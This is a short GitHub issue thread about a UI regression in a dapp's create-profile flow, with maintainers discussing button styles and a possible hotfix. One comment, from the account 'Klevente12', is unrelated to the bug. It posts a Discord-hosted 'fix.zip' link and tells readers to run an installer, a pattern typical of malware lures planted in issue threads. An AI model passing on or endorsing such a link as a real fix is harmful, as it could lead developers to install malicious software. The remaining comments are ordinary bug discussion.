### ISSUE TITLE
UI changes in create profile flow

### ISSUE THREAD

**Issue by maryjaf** [Giveth/giveth-dapps-v2#4665]
**Describe the bug**
It seems some design was changed in create profile flow
please take a look on below screen record 

https://github.com/user-attachments/assets/ad5e7a88-867b-4e08-94d4-31e13a127812

@divine-comedian

**Comment by Klevente12** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by divine-comedian** [comment]
Yep, something definitely looks wrong 

On the "Your profile is incomplete" modal it should only be a yellow bold text that is clickable, not a button

it also appears on the following modal that two primary button styles are being used, where as we should use the pinky style with primary on top and seconday button style below. 

@kkatusic can you lookup how this regression happened and how we can revert it to before. 

This is currently on production so will need to push a hotfix

**Comment by kkatusic** [comment]
@LatifatAbdullahi that button as I can see inside code should be blue

**Comment by LatifatAbdullahi** [comment]
@kkatusic 
Thanks for confirming.. it is as expected then.
